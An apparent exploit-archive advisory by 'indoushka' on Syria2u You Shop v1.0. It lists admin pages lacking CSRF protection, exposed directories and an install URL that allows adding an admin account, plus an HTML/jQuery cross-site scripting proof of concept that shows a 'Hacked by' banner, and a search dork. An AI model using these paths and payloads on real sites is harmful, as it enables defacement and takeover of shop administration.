Syria2u You Shop version 1.0 suffers from cross site request forgery and cross site scripting vulnerabilities.
5a9a82af6ecdffc5eb56418866b2a37da0a5fd26a7b6aea4fb6b74e69a16d68e
| # Title : Syria2u You Shop v1.0 Mullti Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : سكربت يوشــوب للتسوق عبر الانترنت , قم باختيار المدينة ثم تمتع بالتسوق في مدينتك من أي مكان
| # Tested on: win8.1 Fr V.(Pro) 15:39 * 23/05/2015
| # Bug : Mullti
| # Download : http://www.syria2u.com/
=======================================
HTML form without CSRF protection :
http://127.0.0.1/YouShop/Admin/system/addImage.php
http://127.0.0.1/YouShop/Admin/system/addVideo.php
http://127.0.0.1/YouShop/Admin/system/cckAddEdit.php
Directory listing :
http://127.0.0.1/YouShop/admin/editor/
http://127.0.0.1/YouShop/files/
http://127.0.0.1/YouShop/admin/cck/
http://127.0.0.1/YouShop/admin/system/
XSS - jQuery v1.8.0 EXploits :
<html>
<head>
<meta charset="utf-8">
<title>XSS - jQuery v1.8.0 </title>
<script src="http://127.0.0.1/YouShop/admin/js/jquery-1.8.0.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>
<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
reflected - jQuery v1.11.1 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com');</script></option>
</select>
</p>
</form>
</body>
</html>
Add Admin :
http://127.0.0.1/YouShop/install/index.php?install=3
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------